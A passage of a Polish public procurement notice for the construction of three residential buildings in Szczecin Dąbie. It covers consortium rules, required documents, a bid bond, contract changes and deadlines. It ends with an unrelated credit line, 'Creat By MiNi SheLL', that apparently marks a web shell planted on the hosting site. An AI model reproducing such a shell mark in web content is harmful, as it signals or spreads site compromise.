jeżeli co najmniej jeden z <br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada <br/>11<br/>uprawnienia do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej i zrealizuje roboty budowlane, do których realizacji te uprawnienia <br/>są wymagane. <br/>2.3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji <br/>zawodowych lub doświadczenia (o ile zostały sformułowane) Wykonawcy <br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na <br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do <br/>realizacji których te zdolności są wymagane. <br/>2.4. W przypadku, o którym mowa w ust. 2.2 i 2.3, Wykonawcy wspólnie <br/>ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty <br/>oświadczenie, z którego wynika, które roboty budowlane wykonają <br/>poszczególni Wykonawcy – załącznik nr 4 do SWZ. <br/>3. Udostępnienie zasobów. <br/>3.1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w <br/>postępowaniu na zasadach opisanych w art. 118-123 ustawy Pzp, polegać na <br/>zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub <br/>ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru <br/>prawnego łączących go z nimi stosunków prawnych. Podmiot, na zasoby <br/>którego Wykonawca powołuje się w celu wykazania spełnienia warunków <br/>udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie <br/>art. 108 ust. 1 ustawy Pzp, art. 109 ust. 1 pkt 4 ustawy oraz na podstawie <br/>art. 7 ust.1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych <br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę <br/>oraz służących ochronie bezpieczeństwa narodowego. <br/>3.2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji <br/>zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach <br/>podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty <br/>budowlane, do realizacji których te zdolności są wymagane. <br/>3.3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów <br/>udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu <br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów <br/>na potrzeby realizacji danego zamówienia lub inny podmiotowy środek <br/>dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie <br/>dysponował niezbędnymi zasobami tych podmiotów. <br/>3.4. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. <br/>3.3, potwierdza, że stosunek łączący Wykonawcę z podmiotami <br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów <br/>oraz określa, w szczególności: <br/>1)zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby; <br/>2)sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów <br/>podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; <br/>3)czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego <br/>Wykonawca polega w odniesieniu do warunków udziału w postępowaniu <br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, <br/>zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. <br/>12<br/>3.5. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada <br/>solidarnie z Wykonawcą, który polega na jego sytuacji finansowej lub <br/>ekonomicznej, za szkodę poniesioną przez Zamawiającego powstałą wskutek <br/>nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów <br/>podmiot ten nie ponosi winy. <br/>3.6. Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty <br/>udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja <br/>finansowa lub ekonomiczna pozwalają na wykazanie przez Wykonawcę <br/>spełnienia warunków udziału w postępowaniu, a także zbada, czy nie <br/>zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały <br/>przewidziane względem Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">) wykazu robót budowlanych określonych w Dziale IV pkt. 1.4.1. <br/>wykonanych nie wcześniej niż w okresie ostatnich 10 lat, a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie, przed upływem <br/>terminu składania ofert, wraz z podaniem ich rodzaju, wartości, daty, <br/>miejsca wykonania i podmiotów, na rzecz których roboty te zostały <br/>wykonane, z załączeniem dowodów określających czy te roboty <br/>budowlane zostały wykonane należycie, przy czym dowodami, o których <br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, <br/>na rzecz którego roboty budowlane zostały wykonywane, a jeżeli <br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać <br/>tych dokumentów – inne odpowiednie dokumenty (Wzór - Załącznik nr 5 <br/>do SWZ),<br/>2) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia <br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, <br/>kontrolę jakości lub kierowanie robotami budowlanymi, wraz z <br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień i <br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a <br/>także zakresu wykonywanych przez nie czynności oraz informacją o <br/>podstawie do dysponowania tymi osobami (Wzór - Załącznik nr 6 do <br/>SWZ),<br/>3) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, <br/>potwierdzającej wysokość posiadanych środków finansowych lub <br/>zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 <br/>miesiące przed jej złożeniem, na kwotę co najmniej <br/>100.000,00 zł (słownie złotych: sto tysięcy 00/100). <br/>15<br/>4) Odpis lub informację z Krajowego Rejestru Sądowego lub Centralnej <br/>Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 <br/>ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed <br/>jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub <br/>ewidencji</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem <br/>terminu składania ofert, wnieść wadium w kwocie: 50.000,00 PLN (słownie zł.: <br/>pięćdziesiąt tysięcy 00/100). <br/>2. Wadium musi obejmować pełen okres związania ofertą określony w rozdziale XI <br/>SWZ. <br/>3. Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 <br/>ust. 7 ustawy Pzp. <br/>4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy <br/>Zamawiającego: <br/>COBORU SDOO w Szczecinie Dąbiu<br/>Bank: Bank Gospodarstwa Krajowego <br/>Nr rachunku: 73 1130 1088 0001 3111 6520 0005 z dopiskiem na blankiecie <br/>przelewu: wadium na zabezpieczenie oferty przetargowej zadania: „Etap I <br/>budowa trzech budynków mieszkalnych” <br/>Za skutecznie wniesione wadium w pieniądzu Zamawiający uzna wadium, <br/>które w oznaczonym terminie znajduje się na ww. rachunku bankowym <br/>Zamawiającego. Zaleca się dołączenie do oferty kopii polecenia przelewu. <br/>Wadium wniesione w pieniądzu Zamawiający przechowuje na ww. rachunku <br/>bankowym. <br/>5. W przypadku wyboru formy niepieniężnej wadium, Wykonawca zobowiązany <br/>jest wnieść przy użyciu środków komunikacji elektronicznej w formie <br/>oryginalnego elektronicznego dokumentu wadialnego (np. e-gwarancji <br/>bankowej lub ubezpieczeniowej) opatrzonego kwalifikowanym podpisem <br/>elektronicznym osoby upoważnionej do wystawienia dokumentu wadialnego <br/>(np. e- gwarancji bankowej lub ubezpieczeniowej). Niedopuszczalne jest <br/>złożenie skanu dokumentu wadialnego (np. e-gwarancji bankowej lub <br/>ubezpieczeniowej) opatrzonego kwalifikowanym podpisem elektronicznym.<br/>6. W przypadku wyboru formy niepieniężnej wadium, Wykonawca zobowiązany <br/>jest złożyć dokument wadialny (np. e-gwarancję bankową lub <br/>ubezpieczeniową) za pośrednictwem platformy miniPortal. <br/>7. Wadium wnoszone w formie innej niż w pieniądzu musi spełniać wymagania <br/>wynikające z ustawy Pzp, w szczególności określać bezwarunkowy, <br/>nieodwołalny obowiązek zapłaty na pierwsze żądanie Zamawiającego, w <br/>przypadkach określonych w ustawie Pzp oraz być ważne przez okres <br/>związania ofertą, określony w niniejszej SWZ. Musi być wykonalne na <br/>terytorium Rzeczypospolitej Polskiej. <br/>8. Beneficjentem wniesionego wadium jest: COBORU SDOO w Szczecinie <br/>Dąbiu, Goleniowska 56a, 76-847 Szczecin. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> w przypadku Wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia: <br/>a) pełnomocnictwo, w przypadku Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, z treści którego będzie wynikało umocowanie do <br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do <br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie <br/>zamówienia publicznego. Pełnomocnictwo powinno zawierać w <br/>szczególności wskazanie: <br/>14<br/>- postępowania o udzielenie zamówienia publicznego, którego dotyczy, <br/>- wszystkich Wykonawców ubiegających się wspólnie o udzielenie <br/>zamówienia wymienionych z nazwy z określeniem adresu siedziby, <br/>- ustanowionego pełnomocnika oraz zakresu jego pełnomocnictwa, <br/>b) oświadczenie, z którego wynika, które roboty budowlane wykonają <br/>poszczególni Wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany Umowy muszą być dokonywane z zachowaniem wymogów <br/>wynikających z przepisów Prawa zamówień publicznych. <br/>2. Wszelkie zmiany Umowy wymagają zachowania formy pisemnej pod rygorem <br/>nieważności. <br/>3. Określając warunki dokonania zmiany Umowy, sporządza się Protokół <br/>konieczności, biorąc pod uwagę w szczególności: <br/>1) opis zmiany, <br/>2) uzasadnienie zmiany, <br/>3) koszt zmiany i sposób jego wyliczenia, <br/>4) wpływ zmiany na wysokość wynagrodzenia, <br/>5) czas wykonania zmiany, <br/>6) wpływ zmiany na termin zakończenia Umowy. <br/>4. Oprócz zmian dopuszczalnych ustawą Prawo Zamówień Publicznych (o <br/>których mowa w art. 455 ust. 1 pkt 2-4 i ust. 2) Zamawiający działając zgodnie <br/>z art. 455 ust 1 ustawy Pzp przewiduje możliwość zmiany postanowień <br/>zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano <br/>wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z <br/>okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków <br/>ich wprowadzenia: <br/>1) Zamawiający dopuszcza przedłużenie terminu wykonania przedmiotu <br/>zamówienia o czas opóźnienia, jeżeli takie opóźnienie ma lub będzie miało <br/>wpływ na wykonanie przedmiotu zamówienia w przypadku: <br/>a) jeśli pojawiły się okoliczności natury obiektywnej, których nie można <br/>było przewidzieć w chwili zawierania Umowy, uniemożliwiające <br/>dotrzymanie terminu wykonania określonego w Umowie; <br/>b) jeśli dotrzymanie terminu wskazanego pierwotnie okazało się <br/>niemożliwe z powodów, za które nie ponosi odpowiedzialności <br/>Wykonawca, w tym wstrzymania realizacji <br/>Przedmiotu Umowy przez Zamawiającego; <br/>c) jeśli w toku realizacji Umowy pojawiła się konieczność wykonania <br/>robót lub prac nieprzewidzianych w Umowie i których Wykonawca nie <br/>był w stanie przewidzieć przy dochowaniu należytej staranności, a bez <br/>wykonania których prawidłowe wykonanie <br/>Przedmiotu Umowy jest niemożliwe lub co najmniej utrudnione; <br/>d) wystąpienia niekorzystnych warunków atmosferycznych w postaci <br/>trwających powyżej <br/>4 dni: <br/>temperatury poniżej 0o C, <br/>opadów śniegu, gradu lub deszczu, uniemożliwiających <br/>prowadzenie robót <br/>budowlanych, przeprowadzenie prób i sprawdzeń, dokonywania <br/>odbiorów; <br/>e) wystąpienia sił wyższych i klęsk żywiołowych (np. huragan, powódź, <br/>trzęsienie ziemi, zbyt wysokie lub zbyt niskie temperatury powietrza <br/>oraz warunki atmosferyczne uniemożliwiające zachowanie wymogów <br/>technologicznych, bunty, niepokoje, strajki, okupacje budowy przez <br/>osoby trzecie nie związane z Wykonawcą, nowe obostrzenia <br/>wynikające ze stanu zagrożenia epidemiologicznego lub stanu <br/>epidemii, decyzje odpowiednich władz uniemożliwiających <br/>prowadzenie robót lub pozostałych działań itp.) niezależnych od <br/>Zamawiającego i Wykonawcy, uniemożliwiających wykonanie <br/>Przedmiotu Umowy w ustalonym w Umowie terminie; <br/>f) ograniczenia w dostępie do terenu objętego robotami; <br/>g) ograniczenia lub braku materiałów budowlanych niezbędnych do <br/>wykonania umowy, <br/>h) konieczności wykonania robot dodatkowych określonych w art. 455 <br/>ust. 1 pkt 3 Pzp oraz robót zwiększających zakres zamówienia na <br/>podstawie art. 455 ust. 2 Pzp., <br/>i) w przypadku wykrycia poważnych wad dokumentacji projektowej na <br/>etapie wykonywania Umowy, które będą miały istotny wpływ na <br/>wykonywanie przedmiotu Umowy – gdy okoliczność ta wpłynęła na <br/>konieczność zmiany wynagrodzenia, wymogów w zakresie odbioru <br/>robót, terminu wykonania i innych okoliczności powstałych w związku <br/>z zaistniałą wadą dokumentacji projektowej i zmiany te będą <br/>konieczne, gdyż kontynuacja wykonania Umowy groziłaby <br/>powstaniem Obiektu obarczonego wadą. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">epuap:/SDOOSZCZECIN/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-03 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com